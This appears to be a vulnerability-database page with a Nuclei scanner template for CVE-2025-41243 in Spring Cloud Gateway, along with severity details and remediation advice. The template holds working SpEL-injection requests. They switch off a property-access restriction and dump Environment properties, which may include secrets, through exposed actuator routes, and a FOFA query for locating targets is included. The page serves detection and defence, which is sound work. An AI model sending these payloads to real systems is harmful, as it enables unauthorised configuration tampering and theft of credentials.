Spring Cloud Gateway Server Webflux - Broken Access Control
CVE-2025-41243
Early Release
Description
Spring Cloud Gateway Server Webflux contains a vulnerability caused by unsecured and exposed actuator endpoints allowing modification of Spring Environment properties, letting attackers modify configuration, exploit requires unsecured actuator endpoints exposure.
Severity
Critical
CVSS Score
10
Exploit Probability
10%
Published Date
October 23, 2025
Template Author
redmomn
CVE-2025-41243.yaml
id: CVE-2025-41243
info:
name: Spring Cloud Gateway Server Webflux - Broken Access Control
author: Redmomn
severity: critical
description: |
Spring Cloud Gateway Server Webflux contains a vulnerability caused by unsecured and exposed actuator endpoints allowing modification of Spring Environment properties, letting attackers modify configuration, exploit requires unsecured actuator endpoints exposure.
impact: |
Attackers can modify Spring Environment properties, potentially leading to configuration tampering and further compromise.
remediation: |
Secure actuator endpoints or disable gateway actuator exposure; update to latest Spring Cloud Gateway Server Webflux version.
reference:
- https://blog.z3r.ru/posts/spring-cloud-gateway-spel-vuln/
- https://xz.aliyun.com/news/19006
- https://spring.io/security/cve-2025-41243
- https://nvd.nist.gov/vuln/detail/CVE-2025-41243
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2025-41243
epss-score: 0.10243
epss-percentile: 0.92817
cwe-id: CWE-94
metadata:
verified: true
fofa-query: '((header="Server: Netty@SpringBoot" || (body="Whitelabel Error Page" && body="There was an unexpected error")) && body!="couchdb") || title="SpringBootAdmin-Server" || body="SpringBoot"'
tags: cve,cve2025,spring-boot,injection
variables:
route: "{{rand_text_alpha(8)}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
POST /actuator/gateway/routes/{{route}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"id": "{{route}}",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"value": "#{ @systemProperties['spring. cloud.gateway.restrictive-property-accessor.enabled'] = false}",
"name": "cmd"
}
}
],
"uri": "http://{{interactsh-url}}",
"order": 0
}
- |
POST /actuator/gateway/refresh HTTP/1.1
Host: {{Hostname}}
- |
GET /actuator/gateway/routes/{{route}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 201 && status_code_2 == 200 && status_code_3 == 200'
- 'len(body_1) == 0 && len(body_2) == 0'
- 'contains_all(body_3, "AddResponseHeader", "route_id")'
condition: and
internal: true
- raw:
- |
POST /actuator/gateway/routes/{{route}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"id": "{{route}}",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"value": "#{ @environment.getPropertySources.?[#this.name matches '.*optional:classpath:.*' ][0].source.![{#this.getKey+'='+#this.getValue.toString}] }",
"name": "cmd"
}
}
],
"uri": "http://{{interactsh-url}}",
"order": 0
}
matchers:
- type: dsl
dsl:
- 'status_code == 201'
- 'len(body) == 0'
condition: and
internal: true
- raw:
- |
POST /actuator/gateway/refresh HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'len(body) == 0'
condition: and
internal: true
- raw:
- |
GET /actuator/gateway/routes/{{route}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "spring.cloud.gateway","RouteDefinitionRouteLocator")'
condition: and
# digest: 4b0a00483046022100a003e85a23f528e5e1b079b3de518dc468998b140a7d8610dd05bafb75a4d4d1022100f63545ea55ee7eaeabd5f6147e63f91cbb0f1e07d0ad966c464203431298103e:922c64590222798bb761d5b6d8e7295010.0Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-41243
CWE ID:
cwe-94
Remediation Steps
Secure actuator endpoints or disable gateway actuator exposure; update to latest Spring Cloud Gateway Server Webflux version.